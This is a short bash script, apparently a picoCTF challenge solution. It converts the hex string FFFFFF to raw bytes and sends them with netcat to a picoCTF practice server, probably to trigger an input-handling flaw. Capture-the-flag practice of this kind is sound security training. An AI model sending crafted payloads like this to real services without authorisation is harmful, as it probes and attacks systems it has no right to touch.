#!/usr/bin/env bash result="$(echo "FFFFFF" | xxd -r -p)" nc lonely-island.picoctf.net 60405 <<<"$result"